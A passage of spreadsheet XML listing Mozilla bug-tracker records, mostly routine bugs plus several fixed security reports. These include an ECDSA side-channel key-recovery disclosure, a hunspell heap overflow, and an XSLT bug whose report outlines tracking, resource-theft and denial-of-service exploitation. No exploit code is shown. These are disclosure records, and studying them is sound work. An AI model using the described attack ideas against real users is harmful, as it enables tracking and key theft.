      <c r="O6237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6237" t="inlineStr">
        <is>
          <t>[fireplace]</t>
        </is>
      </c>
      <c r="Q6237" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6237" t="inlineStr">
        <is>
          <t>2013-03-21</t>
        </is>
      </c>
      <c r="T6237" t="n">
        <v>1</v>
      </c>
      <c r="U6237" t="n">
        <v>0</v>
      </c>
      <c r="V6237" t="n">
        <v>2</v>
      </c>
      <c r="W6237" t="inlineStr">
        <is>
          <t>1. Load http://localhost:8675/search?cat=lifestyle
2. Click a link to a detail page.
3. Go back in history.
4. Notice you're on the search results page again. Now try going forward in history.
5. OH WAIT YOU CAN'T!</t>
        </is>
      </c>
      <c r="X6237" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6238">
      <c r="A6238" t="n">
        <v>1407754</v>
      </c>
      <c r="B6238" t="inlineStr">
        <is>
          <t>2017-10-11 12:46:27 -0700</t>
        </is>
      </c>
      <c r="C6238" t="inlineStr">
        <is>
          <t>Adding a toolbar item to the toolbar from Customize mode, and exiting Customize Mode quickly reverts the addition</t>
        </is>
      </c>
      <c r="D6238" t="inlineStr">
        <is>
          <t>2017-12-26 03:14:44 -0800</t>
        </is>
      </c>
      <c r="E6238" t="n">
        <v>1</v>
      </c>
      <c r="F6238" t="n">
        <v>1</v>
      </c>
      <c r="G6238" t="n">
        <v>2</v>
      </c>
      <c r="H6238" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6238" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6238" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K6238" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6238" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6238" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6238" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6238" t="inlineStr"/>
      <c r="Q6238" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6238" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6238" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T6238" t="n">
        <v>1</v>
      </c>
      <c r="U6238" t="n">
        <v>0</v>
      </c>
      <c r="V6238" t="n">
        <v>6</v>
      </c>
      <c r="W6238" t="inlineStr">
        <is>
          <t>STR:
Enter Customize Mode
Right click on the Subscribe button
Choose "Add to Toolbar"
Immediately hit "Escape"
ER:
The Subscribe button should be in the toolbar
AR:
The Subscribe button isn't in the toolbar. Entering Customize mode again shows that it is still in the customization palette.</t>
        </is>
      </c>
      <c r="X6238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6239">
      <c r="A6239" t="n">
        <v>1400091</v>
      </c>
      <c r="B6239" t="inlineStr">
        <is>
          <t>2017-09-14 18:58:37 -0700</t>
        </is>
      </c>
      <c r="C6239" t="inlineStr">
        <is>
          <t>WebVR reftests are permacrashing on OSX since the uplift to Beta</t>
        </is>
      </c>
      <c r="D6239" t="inlineStr">
        <is>
          <t>2017-09-16 07:36:07 -0700</t>
        </is>
      </c>
      <c r="E6239" t="n">
        <v>1</v>
      </c>
      <c r="F6239" t="n">
        <v>1</v>
      </c>
      <c r="G6239" t="n">
        <v>3</v>
      </c>
      <c r="H6239" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6239" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6239" t="inlineStr">
        <is>
          <t>WebVR</t>
        </is>
      </c>
      <c r="K6239" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L6239" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6239" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6239" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6239" t="inlineStr">
        <is>
          <t>gfx-noted</t>
        </is>
      </c>
      <c r="Q6239" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6239" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6239" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T6239" t="n">
        <v>1</v>
      </c>
      <c r="U6239" t="n">
        <v>0</v>
      </c>
      <c r="V6239" t="n">
        <v>6</v>
      </c>
      <c r="W6239" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Permafailing tests on Beta
Pretty obvious fallout from bug 1383907. Please fix or disable ASAP as this is now permafailing on Beta.
https://treeherder.mozilla.org/logviewer.html#?job_id=131174811&amp;repo=mozilla-beta</t>
        </is>
      </c>
      <c r="X6239" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6240">
      <c r="A6240" t="n">
        <v>1072494</v>
      </c>
      <c r="B6240" t="inlineStr">
        <is>
          <t>2014-09-24 12:05:33 -0700</t>
        </is>
      </c>
      <c r="C6240" t="inlineStr">
        <is>
          <t>Release notes for 4.0.15</t>
        </is>
      </c>
      <c r="D6240" t="inlineStr">
        <is>
          <t>2014-10-06 07:13:32 -0700</t>
        </is>
      </c>
      <c r="E6240" t="n">
        <v>1</v>
      </c>
      <c r="F6240" t="n">
        <v>1</v>
      </c>
      <c r="G6240" t="n">
        <v>4</v>
      </c>
      <c r="H6240" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6240" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6240" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K6240" t="inlineStr">
        <is>
          <t>4.0</t>
        </is>
      </c>
      <c r="L6240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6240" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6240" t="inlineStr"/>
      <c r="Q6240" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6240" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6240" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T6240" t="n">
        <v>1</v>
      </c>
      <c r="U6240" t="n">
        <v>0</v>
      </c>
      <c r="V6240" t="n">
        <v>5</v>
      </c>
      <c r="W6240" t="inlineStr">
        <is>
          <t>Release notes changes describing security fixes since last release.</t>
        </is>
      </c>
      <c r="X6240" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6241">
      <c r="A6241" t="n">
        <v>561852</v>
      </c>
      <c r="B6241" t="inlineStr">
        <is>
          <t>2010-04-26 14:14:55 -0700</t>
        </is>
      </c>
      <c r="C6241" t="inlineStr">
        <is>
          <t>nagios failing to find running buildbot process on moz2-linux-slave51</t>
        </is>
      </c>
      <c r="D6241" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6241" t="n">
        <v>1</v>
      </c>
      <c r="F6241" t="n">
        <v>1</v>
      </c>
      <c r="G6241" t="n">
        <v>5</v>
      </c>
      <c r="H6241" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6241" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6241" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6241" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6241" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6241" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6241" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6241" t="inlineStr"/>
      <c r="Q6241" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6241" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6241" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6241" t="n">
        <v>1</v>
      </c>
      <c r="U6241" t="n">
        <v>0</v>
      </c>
      <c r="V6241" t="n">
        <v>2</v>
      </c>
      <c r="W6241" t="inlineStr">
        <is>
          <t>We had a bunch of issues getting moz2-linux-slave51 back in staging last week (see bug 560460). The latest issue is that the nagios buildbot check is failing to detect the running buildbot process, despite the slave being connected to the master and successfully running builds.
Here's a comparison of the command output from moz2-linux-slave51 and moz2-linux-slave04, the other linux slave currently connect to staging-try that is *not* failing this check:
moz2-linux-slave51:
[cltbld@moz2-linux-slave51 ~]$ /usr/lib/nagios/plugins/check_procs -w 1:1 -C buildbot -vvv | grep buildbot | grep -v grep
Sl     500  3993     1  23932  7440  0.0 python          python /tools/buildbot/bin/buildbot start /builds/slave
proc#=0 uid=500 vsz=23932 rss=7440 pid=3993 ppid=1 pcpu=0.00 stat=Sl etime= prog=python args=python /tools/buildbot/bin/buildbot start /builds/slave
R+     500  5009  3194   3704   632  0.0 check_procs     /usr/lib/nagios/plugins/check_procs -w 1:1 -C buildbot -vvv
proc#=0 uid=500 vsz=3704 rss=632 pid=5009 ppid=3194 pcpu=0.00 stat=R+ etime= prog=check_procs args=/usr/lib/nagios/plugins/check_procs -w 1:1 -C buildbot -vvv
PROCS WARNING: 0 processes with command name 'buildbot'
moz2-linux-slave04:
-bash-3.1$ /usr/lib/nagios/plugins/check_procs -w 1:1 -C buildbot -vvv | grep buildbot | grep -v grep
Sl     500  3003     1  24624  8224  0.2 buildbot        /tools/python/bin/python /tools/buildbot/bin/buildbot start /builds/slave
proc#=0 uid=500 vsz=24624 rss=8224 pid=3003 ppid=1 pcpu=0.20 stat=Sl etime= prog=buildbot args=/tools/python/bin/python /tools/buildbot/bin/buildbot start /builds/slave
R+     500 22311  3343   3716   640  0.0 check_procs     /usr/lib/nagios/plugins/check_procs -w 1:1 -C buildbot -vvv
proc#=1 uid=500 vsz=3716 rss=640 pid=22311 ppid=3343 pcpu=0.00 stat=R+ etime= prog=check_procs args=/usr/lib/nagios/plugins/check_procs -w 1:1 -C buildbot -vvv
PROCS OK: 1 process with command name 'buildbot'
The running buildbot command is being incorrectly detected as 'python' on slave51.</t>
        </is>
      </c>
      <c r="X6241" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6242">
      <c r="A6242" t="n">
        <v>1387107</v>
      </c>
      <c r="B6242" t="inlineStr">
        <is>
          <t>2017-08-03 08:42:35 -0700</t>
        </is>
      </c>
      <c r="C6242" t="inlineStr">
        <is>
          <t>Stop and Start Spark Session After Each Experiment</t>
        </is>
      </c>
      <c r="D6242" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:01 -0700</t>
        </is>
      </c>
      <c r="E6242" t="n">
        <v>1</v>
      </c>
      <c r="F6242" t="n">
        <v>1</v>
      </c>
      <c r="G6242" t="n">
        <v>2</v>
      </c>
      <c r="H6242" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6242" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J6242" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6242" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6242" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6242" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6242" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6242" t="inlineStr"/>
      <c r="Q6242" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6242" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6242" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6242" t="n">
        <v>1</v>
      </c>
      <c r="U6242" t="n">
        <v>0</v>
      </c>
      <c r="V6242" t="n">
        <v>2</v>
      </c>
      <c r="W6242" t="inlineStr">
        <is>
          <t>This will hopefully fix some of the issues we're having running it, as spark has trouble running multiple jobs consecutively.</t>
        </is>
      </c>
      <c r="X6242" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6243">
      <c r="A6243" t="n">
        <v>1256493</v>
      </c>
      <c r="B6243" t="inlineStr">
        <is>
          <t>2016-03-14 17:15:05 -0700</t>
        </is>
      </c>
      <c r="C6243" t="inlineStr">
        <is>
          <t>hunspell: heap-buffer-overflow write in [@u16_u8]</t>
        </is>
      </c>
      <c r="D6243" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:23 -0700</t>
        </is>
      </c>
      <c r="E6243" t="n">
        <v>1</v>
      </c>
      <c r="F6243" t="n">
        <v>1</v>
      </c>
      <c r="G6243" t="n">
        <v>3</v>
      </c>
      <c r="H6243" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6243" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6243" t="inlineStr">
        <is>
          <t>Spelling checker</t>
        </is>
      </c>
      <c r="K6243" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6243" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6243" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6243" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6243" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6243" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6243" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T6243" t="n">
        <v>1</v>
      </c>
      <c r="U6243" t="n">
        <v>0</v>
      </c>
      <c r="V6243" t="n">
        <v>6</v>
      </c>
      <c r="W6243" t="inlineStr">
        <is>
          <t>Created attachment 8730455
call_stack.txt
Found in hunspell revision ded5b4c62c37084d216154e02e4d5e6efbd3ccfa
To reproduce:
run ./src/tools/example tests/base_utf.aff tests/base_utf.dic test_case.txt</t>
        </is>
      </c>
      <c r="X6243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6244">
      <c r="A6244" t="n">
        <v>1592276</v>
      </c>
      <c r="B6244" t="inlineStr">
        <is>
          <t>2019-10-29 07:32:06 -0700</t>
        </is>
      </c>
      <c r="C6244" t="inlineStr">
        <is>
          <t>update black to 19.10b0</t>
        </is>
      </c>
      <c r="D6244" t="inlineStr">
        <is>
          <t>2019-11-05 09:04:18 -0800</t>
        </is>
      </c>
      <c r="E6244" t="n">
        <v>1</v>
      </c>
      <c r="F6244" t="n">
        <v>1</v>
      </c>
      <c r="G6244" t="n">
        <v>4</v>
      </c>
      <c r="H6244" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6244" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6244" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6244" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6244" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6244" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6244" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6244" t="inlineStr"/>
      <c r="Q6244" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6244" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6244" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6244" t="n">
        <v>1</v>
      </c>
      <c r="U6244" t="n">
        <v>0</v>
      </c>
      <c r="V6244" t="n">
        <v>12</v>
      </c>
      <c r="W6244" t="inlineStr">
        <is>
          <t>We're using black to format all our Python code. The black project released 19.10b0. Because we use it for formatting, it's likely any updates will result in formatting changes across the codebase.
This bug covers updating:
* antenna
* socorro-submitter
* socorro</t>
        </is>
      </c>
      <c r="X6244" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6245">
      <c r="A6245" t="n">
        <v>223041</v>
      </c>
      <c r="B6245" t="inlineStr">
        <is>
          <t>2003-10-20 21:40:20 -0700</t>
        </is>
      </c>
      <c r="C6245" t="inlineStr">
        <is>
          <t>eval (and possibly other natives) "thunk" should not run with chrome privs</t>
        </is>
      </c>
      <c r="D6245" t="inlineStr">
        <is>
          <t>2005-10-18 11:38:03 -0700</t>
        </is>
      </c>
      <c r="E6245" t="n">
        <v>1</v>
      </c>
      <c r="F6245" t="n">
        <v>1</v>
      </c>
      <c r="G6245" t="n">
        <v>3</v>
      </c>
      <c r="H6245" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6245" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6245" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K6245" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6245" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6245" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6245" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6245" t="inlineStr">
        <is>
          <t>[sg:mustfix]</t>
        </is>
      </c>
      <c r="Q6245" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6245" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6245" t="inlineStr">
        <is>
          <t>mozilla1.6beta</t>
        </is>
      </c>
      <c r="T6245" t="n">
        <v>1</v>
      </c>
      <c r="U6245" t="n">
        <v>0</v>
      </c>
      <c r="V6245" t="n">
        <v>37</v>
      </c>
      <c r="W6245" t="inlineStr">
        <is>
          <t>See bug 217195.  When content defines eval as a setter for a property in a
content DOM object that chrome calls, when eval runs it should use its "object
principals", which come unalterably from its global object via the parent link.
See bug 213946 for a typedef,
+typedef JSPrincipals *
+(* JS_DLL_CALLBACK JSGetObjectPrincipals)(JSContext *cx, JSObject *obj);
that seems helpful here, if used to declare a JSRuntime member set by caps code.
If set, obj_eval (jsobj.c) would call that hook on the parent of the eval funobj
being called (argv[-2]), and prefer the result to the caller's principals.
Can anyone think of native functions other than eval that need such treatment? 
Ah -- Script.prototype.compile and the Script constructor, of course.
/be</t>
        </is>
      </c>
      <c r="X6245" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6246">
      <c r="A6246" t="n">
        <v>756719</v>
      </c>
      <c r="B6246" t="inlineStr">
        <is>
          <t>2012-05-18 20:40:33 -0700</t>
        </is>
      </c>
      <c r="C6246" t="inlineStr">
        <is>
          <t>Object.defineProperty can shadow window.location</t>
        </is>
      </c>
      <c r="D6246" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:14 -0700</t>
        </is>
      </c>
      <c r="E6246" t="n">
        <v>1</v>
      </c>
      <c r="F6246" t="n">
        <v>1</v>
      </c>
      <c r="G6246" t="n">
        <v>3</v>
      </c>
      <c r="H6246" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6246" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6246" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6246" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L6246" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6246" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6246" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6246" t="inlineStr">
        <is>
          <t>[js:p1:fx15][advisory-tracking+] fixed by bug 750307</t>
        </is>
      </c>
      <c r="Q6246" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6246" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6246" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6246" t="n">
        <v>1</v>
      </c>
      <c r="U6246" t="n">
        <v>0</v>
      </c>
      <c r="V6246" t="n">
        <v>41</v>
      </c>
      <c r="W6246" t="inlineStr">
        <is>
          <t>Created attachment 625346
PoC
Yet another variant of bug 735073, bug 665548, and bug 541530: it is possible to shadow the location object using Object.defineProperty. Verified with the current release build.</t>
        </is>
      </c>
      <c r="X6246" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6247">
      <c r="A6247" t="n">
        <v>1631583</v>
      </c>
      <c r="B6247" t="inlineStr">
        <is>
          <t>2020-04-20 13:06:24 -0700</t>
        </is>
      </c>
      <c r="C6247" t="inlineStr">
        <is>
          <t>Side channel attack on ECDSA signature generation</t>
        </is>
      </c>
      <c r="D6247" t="inlineStr">
        <is>
          <t>2024-06-17 11:11:07 -0700</t>
        </is>
      </c>
      <c r="E6247" t="n">
        <v>1</v>
      </c>
      <c r="F6247" t="n">
        <v>1</v>
      </c>
      <c r="G6247" t="n">
        <v>3</v>
      </c>
      <c r="H6247" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6247" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6247" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6247" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6247" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6247" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6247" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6247" t="inlineStr">
        <is>
          <t>[sec-moderate in Firefox][disclosure date 2020-07-28][RedHat INC1266630][sec-survey][adv-main80+]</t>
        </is>
      </c>
      <c r="Q6247" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6247" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6247" t="inlineStr">
        <is>
          <t>3.55</t>
        </is>
      </c>
      <c r="T6247" t="n">
        <v>1</v>
      </c>
      <c r="U6247" t="n">
        <v>0</v>
      </c>
      <c r="V6247" t="n">
        <v>57</v>
      </c>
      <c r="W6247" t="inlineStr">
        <is>
          <t>Created attachment 9141838
wnaf_trace.jpg
[filed from mail to security@ from Sohaib ul Hassan]
Hey Folks!
We are a team of security researchers from Tampere University, Finland.
We have discovered a vulnerability in ECDSA signature generation that
enables us to exfiltrate information from various side channels and
recover the private key.
# Vulnerable function
The vulnerability is found in the non-constant time ECC scalar
multiplication function ec_GFp_pt_mul_jm_wNAF @
lib/freebl/ecl/ecp_jm.cecp_jm.c. This code path is executed when
either NIST_P384 or NIST_P521 EC curve is selected. The wNAF scalar
multiplication computes EC point doubling (ec_GFp_pt_dbl_jm) at each
iteration, with a conditional branch depending on non-zero scalar
digits, which computes an EC point addition (ec_GFp_pt_add_jm_aff).
In general, wNAF point multiplication algorithm is known to be
vulnerable, and successfully targeted in the past e.g. in OpenSSL
ECDSA with L1 cache timings [4], LLC cache timings [3],
ElectroMagnetic emanations (EM) [2], and port contention [1].
Using the EM side-channel, we successfully extracted the position of
zero and non-zero wNAF digits while nss-certutil tool performed scalar
multiplication during the ECDSA signature generation, leaking partial
information about the ECDSA nonce. Given a small number of ECDSA
signatures, this information can be used to steal the private key.
Attached with this report, an EM trace which clearly reveals the
position of point doubling and additions.
We used the EM channel for simplicity, but also achieved success with
various other SW-based channels, including but not limited to timing.
Additionally and related to ECDSA signature generation, we also
exploited using a software controlled side-channel attack the wNAF
encoding function ec_compute_wNAF @ lib/freebl/ecl/ec_naf.c. We were
able to recover the wNAF encoding of the scalar using a single trace.
# Fix
Replace the non-constant time wNAF calls with a constant time
implementation. Our team is willing to help with the fix.
# Disclosure
We are planning for a public disclosure on May 18. But this embargo
date  is also up for discussion.
# Links
[1]:
https://www.thomas-krenn.com/en/wiki/PortSmash_Side-Channel_Vulnerability_CVE-2018-5407
[2]: https://eprint.iacr.org/2016/230.pdf
[3]: https://eprint.iacr.org/2014/161.pdf
[4]: https://www.iacr.org/archive/asiacrypt2009/59120664/59120664.pdf
We appreciate if you could take a look at this issue at your earliest
convenience. Thanks.
Best Regards,
Sohaib ul Hassan
Doctoral Researcher
Network and Information Security Group
Tampere University
Finland</t>
        </is>
      </c>
      <c r="X6247" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6248">
      <c r="A6248" t="n">
        <v>1309630</v>
      </c>
      <c r="B6248" t="inlineStr">
        <is>
          <t>2016-10-12 09:39:55 -0700</t>
        </is>
      </c>
      <c r="C6248" t="inlineStr">
        <is>
          <t>Code execution after tab and window close.</t>
        </is>
      </c>
      <c r="D6248" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:28 -0700</t>
        </is>
      </c>
      <c r="E6248" t="n">
        <v>1</v>
      </c>
      <c r="F6248" t="n">
        <v>1</v>
      </c>
      <c r="G6248" t="n">
        <v>3</v>
      </c>
      <c r="H6248" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6248" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6248" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K6248" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L6248" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6248" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6248" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6248" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main97+]</t>
        </is>
      </c>
      <c r="Q6248" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6248" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6248" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T6248" t="n">
        <v>1</v>
      </c>
      <c r="U6248" t="n">
        <v>0</v>
      </c>
      <c r="V6248" t="n">
        <v>24</v>
      </c>
      <c r="W6248" t="inlineStr">
        <is>
          <t>Created attachment 8800292
Minimal Test Case
STEPS TO REPRODUCE:
  1 Download 'exploit.xsl' (a minimal testcase of the bug).
  2 Run `python -m SimpleHTTPServer 8080` in a terminal.
  3 Navigate to 'http://localhost:8080/exploit.xsl'.
  4 Check the output of the server started in Step 2.
  5 Open another tab.
  6 Close the 'exploit.xsl' tab.
  7 Check the output of the server started in Step 2.
  8 Close the browser window. Grab lunch.
  9 Check the output of the server started in Step 2.
EXPECTED BEHAVIOR:
  - At Step 4, the server IS reporting incoming GET requests.
  - At Step 7, the server is NOT reporting incoming GET requests.
  - At Step 9, the server is NOT reporting incoming GET requests.
ACTUAL BEHAVIOR:
  - At Step 4, the server IS reporting incoming GET requests.
  - At Step 7, the server IS reporting incoming GET requests.
  - At Step 9, the server IS reporting incoming GET requests.
POSSIBLE EXPLOITATION
A. User Tracking
I've constructed a proof-of-concept user-tracking server that serves
each request a variant of 'exploit.xsl' which has been tagged with a 
unique identifying number. The server sleeps for several seconds before
responding to each incoming request, so as not to cause an undue amount
of network traffic. Upon each request, the server logs the time of the
heartbeat, the user ID, and their IP address. This leaks, roughly, the
user's possibly-changing location and their computer usage habits.
B. Theft of Computing Resources
This bug can be exploited to force the user's browser to perform general
computation after the user has left the page. The attached file does not
have a base-case to its recursive calls, but can be easily modified to
have one that forwards the result of the computation to the attacker.
C. Denial-of-Service Attacks
This attack can be used to generate a large volume of network trafic
from a user after they have left the page. Combined with an XSS attack,
Firefox users could be co-opted into bombarding a site long after they
have left the page.
OTHER OBSERVATIONS
  1 This bug is exploitable with javascript disabled (unsurprising from
    a technical perspective, but given the possible attacks, probably
    surprising from a user's perspective).
